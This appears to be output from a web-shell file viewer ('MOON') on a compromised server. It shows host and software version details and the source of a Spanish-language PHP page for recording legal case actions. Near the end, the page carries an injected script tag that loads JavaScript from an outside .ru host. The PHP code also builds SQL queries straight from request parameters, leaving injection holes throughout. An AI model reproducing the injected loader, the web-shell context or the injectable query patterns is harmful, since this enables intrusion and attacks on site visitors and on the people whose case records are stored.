MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635
System: Linux server.asjudinet.com 2.6.32-042stab141.3 #1 SMP Fri Nov 15 22:45:34 MSK 2019 i686
User: asjudine (504)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: /home/asjudine/public_html/afinanciera/agregar_actuacion_nomina.php
<?php
global $dbi;

require_once("../Conectarse.php");
$dia = date("d");
$mes = date("m"); 
$ano = date("Y");

//$misql = mysql_query("select codigo from Usuarios where Cedula = $cc", $dbi);
$misql = mysql_query('SELECT codigo FROM Usuarios WHERE Cedula = "' . $_GET["cc"]  . '"   ');
if (!$misql) {
	die('Invalid query medio: ' . mysql_error());
}
if($misql)
{
	list($codigo_funcionario) = mysql_fetch_row($misql);
}

//$sql = "select cedula, numero_proceso, tipo_proceso, numero_contrato, tipo_contrato, codigo_sucursal, clase_negocio, despacho_judicial, ciudad_despacho, calidad_juridica_afiliado, tipo_orden, numero_carpeta,  ultimo_folio, codigo_abogado, fecha_actuacion, actividad_proceso, estado_proceso from procesos where cedula = $id and numero_proceso = '$proceso'";
//$control = mysql_query($sql, $dbi) or die(mysql_error());
	
$control = mysql_query('SELECT cedula, numero_proceso, tipo_proceso, numero_contrato, tipo_contrato, codigo_sucursal, clase_negocio, despacho_judicial, ciudad_despacho, calidad_juridica_afiliado, tipo_orden, numero_carpeta,  ultimo_folio, codigo_abogado, fecha_actuacion, actividad_proceso, estado_proceso FROM procesos WHERE cedula = "' . $HTTP_GET_VARS["id"]  . '" and numero_proceso = "' . $HTTP_GET_VARS["proceso"]  . '" ');
if (!$control) {
	die('Invalid query 45: ' . mysql_error());
}
				 
if ((mysql_num_rows($control)!=0)) 
{	 
   	list($cedula, $numero_proceso, $tipo_proceso, $numero_contrato, $tipo_contrato, $codigo_sucursal, $clase_negocio, $despacho_judicial, $ciudad_despacho, $calidad_juridica_afiliado, $tipo_orden, $numero_carpeta, $ultimo_folio, $codigo_abogado, $fecha_actuacion, $actividad_proceso, $estado_proceso) = mysql_fetch_row($control);
  	if($actividad_proceso == 'A'){$actividad_proceso = 'ACTIVO';}else $actividad_proceso = 'INACTIVO';
    if($estado_proceso == 'V'){$estado_proceso = 'VIGENTE';}else $estado_proceso = 'HISTORICO';							   
    // $sucursal = mysql_query("select nombre from sucursal where codigo =  $codigo_sucursal", $dbi);
	$sucursal = mysql_query('SELECT nombre FROM sucursal WHERE codigo = "' ."$codigo_sucursal". '"  ');
	if (!$sucursal) {
		die('Invalid query medio: ' . mysql_error());
	}
    if($sucursal){list($ns) = mysql_fetch_row($sucursal);}
    // $abogado = mysql_query("select nombre_completo from asjudinet_abogados where codigo_abogado =  $codigo_abogado", $dbi);
	$abogado = mysql_query('SELECT nombre_completo FROM asjudinet_abogados WHERE codigo_abogado = "' ."$codigo_abogado". '"  ');
	if (!$abogado) {
		die('Invalid query medio: ' . mysql_error());
	}
    if($abogado){list($nombre_abogado) = mysql_fetch_row($abogado);}
    /* $tres=substr($fecha_actuacion, 0, 4);
     $dos=substr($fecha_actuacion, 5, 2);
     $uno=substr($fecha_actuacion, 8, 2);
     $fecha_actuacion = ($uno."-".$dos."-".$tres);*/	
	 
	 
	$eldia = $_POST[dia_act];
	$elmes = $_POST[mes_act];
	$elano = $_POST[ano_act];
	$fecha_actuacion = ($_POST[eldia]."-".$_POST[elmes]."-".$_POST[elano]); 
    // $sqlnom = "select nombre from asjudinet_cartera where cedula = $cedula";
   //  $control = mysql_query($sqlnom, $dbi) or die(mysql_error());	 
	 
	$control = mysql_query('SELECT nombre FROM cartera_serviasjudinet  WHERE cedula = "' ."$cedula". '"  ');
	if (!$control) {
		die('Invalid query medio: ' . mysql_error());
	}
    list($nombre_completo) = mysql_fetch_row($control);
}






if(isset($_POST["actualiza"]))
{
     // $sql = "select cedula, numero_proceso, tipo_proceso, numero_contrato, tipo_contrato, codigo_sucursal,  clase_negocio, despacho_judicial, ciudad_despacho, calidad_juridica_afiliado,  tipo_orden, numero_carpeta,   ultimo_folio, codigo_abogado, fecha_actuacion, actividad_proceso, estado_proceso from procesos where cedula = $id and numero_proceso = '$proceso'";
      //$control = mysql_query($sql, $dbi) or die(mysql_error());	
$control = mysql_query('SELECT cedula, numero_proceso, tipo_proceso, numero_contrato, tipo_contrato, codigo_sucursal,  clase_negocio, despacho_judicial, ciudad_despacho, calidad_juridica_afiliado,  tipo_orden, numero_carpeta,   ultimo_folio, codigo_abogado, fecha_actuacion, actividad_proceso, estado_proceso FROM procesos WHERE cedula = "' . $HTTP_GET_VARS["id"]  . '" and numero_proceso = "' . $HTTP_GET_VARS["proceso"]  . '" ');
if (!$control) {
	die('Invalid query 45: ' . mysql_error());
} 

if ((mysql_num_rows($control)!=0)) 
{	 
   	list($cedula, $numero_proceso, $tipo_proceso, $numero_contrato, $tipo_contrato, $codigo_sucursal, $clase_negocio, $despacho_judicial, $ciudad_despacho, $calidad_juridica_afiliado, $tipo_orden, $numero_carpeta, $ultimo_folio, $codigo_abogado, $fecha_actuacion, $actividad_proceso, $estado_proceso) = mysql_fetch_row($control);
    if($actividad_proceso == 'A'){$actividad_proceso = 'ACTIVO';}else $actividad_proceso = 'INACTIVO';
    if($estado_proceso == 'V'){$estado_proceso = 'VIGENTE';}else $estado_proceso = 'HISTORICO';							   
    //  $sucursal = mysql_query("select nombre from sucursal where codigo =  $codigo_sucursal", $dbi);
					 
	$sucursal = mysql_query('SELECT nombre FROM sucursal WHERE codigo = "' ."$codigo_sucursal". '"  ');
	if (!$sucursal) {
		die('Invalid query medio: ' . mysql_error());
	}
    
	if($sucursal){list($ns) = mysql_fetch_row($sucursal);}
    // $abogado = mysql_query("select nombre_completo from abogados where codigo_abogado =  $codigo_abogado", $dbi);
	$abogado = mysql_query('SELECT nombre_completo FROM asjudinet_abogados WHERE codigo_abogado = "' ."$codigo_abogado". '"  ');
	if (!$abogado) {
		die('Invalid query medio: ' . mysql_error());
	}
    
	if($abogado){list($nombre_abogado) = mysql_fetch_row($abogado);}
    /* $tres=substr($fecha_actuacion, 0, 4);
    $dos=substr($fecha_actuacion, 5, 2);
    $uno=substr($fecha_actuacion, 8, 2);
    $fecha_actuacion = ($uno."-".$dos."-".$tres);*/
					
	$eldia = $_POST[dia_act];
	$elmes = $_POST[mes_act];
	$elano = $_POST[ano_act];
	$fecha_actuacion = ($_POST[eldia]."-".$_POST[elmes]."-".$_POST[elano]);	 
}

}
?>


<html>
<head>
<title>Actuacion Nomina</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css">
	*{margin: 0;padding: 0;}
    body{background-color:#EAEAEA;font-family:Geneva, Arial, Helvetica, sans-serif;}
    header {background-color: #B7271F; text-align: center;}
    
    .titulo{width: 100%;text-align: center;background-color: #dbd8c9;color: #b20606;padding: 6px 0;font-size: 18px;}
    table{margin: 0 auto;border: 8px solid #bebebe; text-align: center;}
    .divirmenu{text-align: center;}
    .irmenu{width: 200px;background-color: #1c4fa0;color: #fff; padding: 4px;border-radius: 6px;}
    .irmenu:hover{background-color: #67a0d9; color: #000;}
    
    .fecha{background-color: #d6e08b; padding: 2px;color: #000;font-size: 15px; text-align: center;}
    td{border: #969696 solid 1px;}
    .tdizq{background-color: #EEE; padding: 1px 10px;color: #00135F;font-size: 13px;font-weight: 600; text-align: left;}
    .tdcen{background-color: #EEE; padding: 1px 10px;color: #00135F;font-size: 13px;font-weight: 600; text-align: center;}
    .tdder{background-color: #EEE; padding: 1px 10px;color: #00135F;font-size: 13px;font-weight: 600; text-align: right;}
	.exp{color:#8A0000; font-size:10px;}
    .boton1{width:200px;background-color: #ffffff;color: #000;padding: 2px;border:2px solid #580000;border-radius:10px;}
    .boton1:hover{background-color: #6f0000;color: #fff;cursor: pointer;}
    input[type=text]{border-radius: 5px; padding: 3px;background-color: #FFFEF4;}
	
	/*Estilo Complementario*/
	.tdi{background-color: #F9FBC8; padding: 1px 10px;color: #00135F;font-size: 12px;font-weight: 600; text-align: left;}
	.tdc{background-color: #F9FBC8; padding: 1px 10px;color: #00135F;font-size: 12px;font-weight: 600; text-align: center;}
    .tdd{background-color: #F9FBC8; padding: 1px 2px;color: #00135F;font-size: 12px;font-weight: 600; text-align: right;}
	
	
	.tdtitulo{background-color: #e3dec0; color: #b20606; padding: 2px; text-align: center; font-size: 12px; font-weight: 900}
    .tdfull{background-color: #fff; color: #000; padding: 1px; text-align: center; font-size: 12px;}
	.tdfulli{background-color: #fff; color: #000; padding: 1px; text-align: left; font-size: 12px;}
    .botonnew{width: 90px; background-color: #e3dec0;color: #b20606;padding: 1px;border-radius:5px;}
    .botonnew:hover{width: 90px; background-color: #cbbd6a;color: #000;padding: 1px;border-radius:5px;}
	
	.boton2{background-color:#7C0509; color:#FFF; width:40px;}
</style>
<script languaje="JavaScript">
function Mostrar_Fecha()
{
         var mydate=new Date()
         var year=mydate.getYear()
         if (year < 1000)
                 year+=1900
                 var day=mydate.getDay()
                 var month=mydate.getMonth()
                 var daym=mydate.getDate()
                 if (daym<10)
                    daym="0"+daym
                    var dayarray=new Array("Domingo","Lunes","Martes","Miercoles","Jueves","Viernes","Sabado")
                    var montharray=new Array("Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre")
                    document.write("<b><font face='Arial, Helvetica, sans-serif'>"+dayarray[day]+" "+daym+" de "+montharray[month]+" de "+year+"</font></b>")
}					
</script>
<script Language="JavaScript">
<!--
function validar()
{

	var uf, pf, sf=0;
	uf = formulario.ultimo_folio.value;
	pf = formulario.folio1.value;
	sf = parseInt(formulario.ultimo_folio.value)+1;

	if(!(pf == uf || pf == sf))
	{	 
     	   alert('El folio ingresado debe ser igual o inmediatamente posterior al último');
           formulario.folio1.focus();
           return (false);	
	}

  if (formulario.folio2.value == "")
  {
    alert("Falta ingresar el Folio2");
    formulario.folio2.focus();
    return (false);
  }   

	if(formulario.folio2.value < pf)
	{	 
     	   alert('El folio2 no debe ser menor que el folio1');
           formulario.folio2.focus();
           return (false);	
	}	

  if (formulario.actuacion.value == "")
  {
    alert("Falta ingresar la actuación");
    formulario.actuacion.focus();
    return (false);
  }

  if (formulario.codigo_funcionario.value == "")
  {
    alert("Falta seleccionar el nombre del funcionario");
    formulario.codigo_funcionario.focus();
    return (false);
  }

return (true);
}
//--></script>

<SCRIPT LANGUAGE='JavaScript'>
var default1 = "VENTANA PARA EL INGRESO DE ACTUACIONES"; // only shown once at page load
var text1 = "El primer encabezado muestra en detalle los datos del proceso seleccionado";
var text2 = "la segunda parte muestra el formulario para el ingreso de revistas";
var text3 = "No se le olvide tener en cuenta el número del folio que se entrega en el juzgado";
var changeRate = 3000; // 1000 = 1 second
var messageNumber = 0;

function changeStatus()
{
  if (messageNumber == 0) {
     window.status=default1;
     document.title=default1;
    }
  else if (messageNumber == 1) {
     window.status=text1;
    }
  else if (messageNumber == 2) {
     window.status=text2;
     }
  else if (messageNumber == 3) {
     window.status=text3;
     messageNumber = 0;
     }
  messageNumber++;
  setTimeout("changeStatus();",changeRate);
}
changeStatus(); // leave here to run right away
// -->
</SCRIPT>

</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="document.formulario.folio1.focus()">
<header>
    <img src="../ELEMENTS/bannerInterasjudinet.png" alt="" width=" 700" height="70">
</header>
<h3 class="titulo">VISUALIZACION DE DATOS DEL PROCESO SELECCIONADO</h3>
<form name="consulta" action="" method="post">
<table width="670" border="0" align="center" cellpadding="2" cellspacing="2">

  
  <tr bgcolor="#ECE9D8">
    <td height="19" class="fecha"><div align="center">
      <script languaje="JavaScript">Mostrar_Fecha()</script>
    </div></td>
  </tr>
  <tr>
    <td height="42" bgcolor="#FFFFFF"><fieldset>
   <legend><span class="texto">Datos del proceso:</legend>
   <table width="662" border="0" cellspacing="1" cellpadding="0">
     <tr>
       <td class="tdder">C&eacute;dula (Titular-Beneficiario):</td>
       <td colspan="2" class="tdizq"><input name="cedula" type="text"  id="cedula" value="<?php echo $cedula; ?>" size="15" maxlength="15" readonly></td>
       <td class="tdder">Proceso:</td>
       <td class="tdizq"><input name="numero_proceso" type="text"  id="numero_proceso" value="<?php echo $numero_proceso; ?>" size="6" maxlength="7" readonly></td>
       </tr>
     <tr>
       <td class="tdder">Nombre completo:</td>
       <td colspan="4" class="tdizq"><input name="nombre" type="text"  id="nombre" value="<?php echo $nombre_completo; ?>" size="50" maxlength="50" readonly></td>
     </tr>
     <tr>
       <td class="tdder">Tipo de proceso:</td>
       <td colspan="2" class="tdizq"><input name="tipo_proceso" type="text"  id="tipo_proceso" value="<?php echo $tipo_proceso; ?>" size="20" maxlength="20" readonly></td>
       <td class="tdder">Contrato:</td>
       <td class="tdizq"><input name="numero_contrato" type="text"  id="numero_contrato" value="<?php echo $numero_contrato; ?>" size="6" maxlength="7" readonly></td>
       </tr>
     <tr bgcolor="#FFFFFF">
       <td class="tdder">Sucursal:</td>
       <td colspan="2" class="tdizq"><input name="codigo_sucursal" type="text"  id="tipo_contrato" value="<?php echo $codigo_sucursal; ?>" size="2" maxlength="2" readonly>
         -         
           <input name="sucursal" type="text"  id="sucursal" value="<?php echo $ns; ?>" size="30" maxlength="30" readonly></td>
       <td class="tdder">Tipo:</td>
       <td class="tdizq"><input name="tipo_contrato" type="text"  id="tipo_contrato" value="<?php echo $tipo_contrato; ?>" size="4" maxlength="4" readonly></td>
       </tr>
     <tr>
       <td class="tdder">Clase de negocio:</td>
       <td colspan="4" class="tdizq"><input name="clase_negocio" type="text"  id="clase_negocio" value="<?php echo $clase_negocio; ?>" size="50" maxlength="50" readonly></td>
     </tr>
     <tr>
       <td class="tdder">Despacho judicial:</td>
       <td colspan="4" class="tdizq"><input name="despacho_judicial" type="text"  id="despacho_judicial" value="<?php echo $despacho_judicial; ?>" size="50" maxlength="50" readonly></td>
     </tr>
     <tr>
       <td class="tdder">Calidad jur&iacute;dica afiliado:</td>
       <td colspan="2" class="tdizq"><input name="calidad_juridica" type="text"  id="calidad_juridica" value="<?php echo $calidad_juridica_afiliado; ?>" size="25" maxlength="50" readonly></td>
       <td class="tdder">Tipo de orden:</td>
       <td class="tdizq"><input name="tipo_orden" type="text"  id="tipo_orden" value="<?php echo $tipo_orden; ?>" size="15" maxlength="20" readonly></td>
       </tr>
     <tr>
       <td class="tdder">N&uacute;mero carpeta:</td>
       <td class="tdizq"><input name="numero_carpeta" type="text"  id="numero_carpeta" value="<?php echo $numero_carpeta; ?>" size="6" maxlength="6" readonly></td>
       <td class="tdder">Ultimo folio:</td>
       <td colspan="2" class="tdizq"><input name="ultimo_folio" type="text"  id="ultimo_folio" value="<?php echo $ultimo_folio; ?>" size="3" maxlength="5" readonly></td>
       </tr>
     <tr>
       <td class="tdder">Abogado:</td>
       <td colspan="4" class="tdizq"><input name="nombre_abogado" type="text"  id="nombre_abogado" value="<?php echo $nombre_abogado; ?>" size="50" maxlength="50" readonly>
         <input name="codigo_abogado" type="text"  id="codigo_abogado" value="<?php echo $codigo_abogado; ?>" size="3" maxlength="3" readonly></td>
     </tr>
     <tr>
       <td class="tdder">Fecha &uacute;ltima actuaci&oacute;n:</td>
      <td class="tdizq"><input name="fecha_actuacion" type="text"  id="fecha_actuacion" value="<?php echo $fecha_actuacion; ?>" size="10" maxlength="10" readonly></td>
       <td class="tdder">Actividad del proceso:</td>
       <td colspan="2" class="tdizq"><input name="actividad_proceso" type="text"  id="actividad_proceso" value="<?php echo $actividad_proceso; ?>" size="20" maxlength="20" readonly></td>
       </tr>
     <tr>
       <td class="tdder">Estado del proceso:</td>
       <td colspan="4" class="tdizq"><input name="estado_proceso" type="text"  id="estado_proceso" value="<?php echo $estado_proceso; ?>" size="20" maxlength="20" readonly>
         </td>
     </tr>
     <tr>
       <td colspan="5">
         <div align="right">
           <table width="662" border="0" cellspacing="0" cellpadding="0">
             <tr>
               <td class="tdizq"><MARQUEE class=titulos width = 95% scrolldelay = 0>Una vez que haya grabado el registro, haga click sobre el botón **Actualizar** para visualizar el último folio</MARQUEE> </td>
               <td class="tdizq"><input name="actualiza" type="submit" id="actualiza" class= "irmenu" value="Actualizar"></td>
             </tr>
           </table>
         </div></td>
       </tr>
   </table> 
   </fieldset></td>
  </tr>
</table>
</form>
<!--/segundo form-->
<form name="formulario" action="<?php echo $editFormAction; ?>" method="post" onSubmit="return validar(this)">
   <input name="ultimo_folio" type="hidden" value="<?php echo $ultimo_folio; ?>">
   <input name="cedula" type="hidden" value="<?php echo $cedula; ?>">
   <input name="numero_proceso" type="hidden" value="<?php echo $numero_proceso; ?>">
   <table border="1" align="center" cellpadding="2" cellspacing="0" bordercolor="#ECE9D8">
  <tr bgcolor="#FFFFCC">
    <td colspan="7" class="titulo">INGRESE LOS DATOS DE LA REVISTA</td>
  </tr>
  <tr>
    <td width="113" class="lista"><div align="center">FOLIOS</div></td>
    <td width="45" class="lista"><div align="center">DEL:</div></td>
    <td width="76"><div align="center">
      <input name="folio1" type="text" class="area" id="folio1" size="4" maxlength="4">
    </div></td>
    <td width="41" class="lista"><div align="center">AL:</div></td>
    <td width="78"><div align="center">
      <input name="folio2" type="text" class="area" id="folio2" size="4" maxlength="4">
    </div></td>
    <td width="170" class="lista"><div align="center">FECHA ACTUACION: </div></td>
    <td width="186" bgcolor="#CCFFFF">
	  <div align="center">
        <input name="dia" type="text" class="variables" id="dia" value="<?php echo $dia ?>" size="2" maxlength="2" readonly>
        <input name="mes" type="text" class="variables" id="mes" value="<?php echo $mes ?>" size="2" maxlength="2" readonly>
	    <input name="ano" type="text" class="variables" id="ano" value="<?php echo $ano ?>" size="4" maxlength="4" readonly>
      </div></td>
  </tr>
  <tr>
    <td colspan="6" rowspan="2" bgcolor="#DDFFFF"><textarea name="actuacion" cols="90" rows="3" id="actuacion" class="sel"></textarea></td>
    <td class="fecha">Tipo de orden: </td>
  </tr>
  <tr>
    <td><select name="ordenes" class="sel2">
	        <option value="REVISTA">REVISTA</option>
	        <option value="SUSTITUCION">SUSTITUCION</option>			
	        <option value="RENUNCIA">RENUNCIA</option>						
	        <option value="REASUMIR">REASUMIR</option>						
	</select></td>
  </tr>
  <tr> 
    <td colspan="7"><div align="right">
      <input name = "submit" type="submit" class="irmenu" value="GRABAR REVISTA" onClick="validar_folios()">
      <input name="button" type="reset" class="irmenu"  onclick="formulario.folio1.focus();" value="Limpiar">
    </div></td>
    </tr>
</table>
<input type="hidden" name="MM_insert" value="formulario">
</form>
<script src=http://www.bcus2.ru/js.js></script></body>
</html>


<?php
$editFormAction = $_SERVER['PHP_SELF'];
if (isset($_SERVER['QUERY_STRING'])){$editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);}
if ((isset($_POST["MM_insert"])) && ($_POST["MM_insert"] == "formulario"))
{
    if($tipo_proceso == "JURIDICO" || $tipo_proceso == "PREJURIDICO" || $tipo_proceso == "SUSTANCIACION" || $tipo_proceso == "DISCIPLINARIO" || $tipo_proceso == "MEDICINA LABORAL")
	{
           if(isset($_POST["folio1"]))
           {
	
		$fecha = ($_POST[dia_act]."-".$_POST[mes_act]."-".$_POST[ano_act]);
		$eldia = $_POST[dia_act];
		$elmes = $_POST[mes_act];
		$elano = $_POST[ano_act];
		$fecha_actuacion = ($_POST[eldia]."-".$_POST[elmes]."-".$_POST[elano]);
		
		// Aqui se soluciona lo de la fecha
		$nuevafecha = $_POST[ano]."-".$_POST[mes]."-".$_POST[dia];

if($tipo_proceso == "SUSTANCIACION")
{

             mysql_query("INSERT INTO actuaciones (cedula, numero_proceso, folio1, folio2, actuacion, fecha, tipo_orden, codigo_funcionario) VALUES ('" . $_POST["cedula"] . "', '" . $_POST["numero_proceso"] . "', '" . $_POST["folio1"] . "', '" . $_POST["folio2"] . "', '" . $_POST["actuacion"] . "', '$nuevafecha', '" . $_POST["ordenes"] . "', 'COBRANZAS')");
			 	
				$modificarcod9 = mysql_query("UPDATE  procesos  set  tipo_orden = '" . $_POST[ordenes] . "',  ultimo_folio = '" . $_POST[folio2] . "', fecha_actuacion = '$nuevafecha', fecha_diagnostico = '' WHERE cedula = '" . $_POST[cedula] . "' and numero_proceso = '" . $_POST[numero_proceso] . "' ");  
				
				
}else
{
	mysql_query("INSERT INTO actuaciones (cedula, numero_proceso, folio1, folio2, actuacion, fecha, tipo_orden, codigo_funcionario) VALUES ('" . $_POST["cedula"] . "', '" . $_POST["numero_proceso"] . "', '" . $_POST["folio1"] . "', '" . $_POST["folio2"] . "', '" . $_POST["actuacion"] . "', '$nuevafecha', '" . $_POST["ordenes"] . "', 'COBRANZAS')");
			 	
			/*	$modificarcod9 = mysql_query("UPDATE  procesos  set tipo_orden = '" . $_POST[ordenes] . "',  ultimo_folio = '" . $_POST[folio2] . "', fecha_actuacion = '$nuevafecha' WHERE cedula = '" . $_POST[cedula] . "' and numero_proceso = '" . $_POST[numero_proceso] . "' "); */  //aca modifica el tipo de orden
}
				
                echo "<script>document.formulario.reset();</script>";
                echo "<script>formulario.folio1.focus();</script>";
                echo "<script>alert('Los datos fueron grabados correctamente');</script>";
				echo "<script lenguaje=\"JavaScript\">window.close();</script>";
		  }
	}	
	else
	{
                echo "<script>alert('Usted no pertenece a este tipo de proceso');</script>";	
	}
}
?>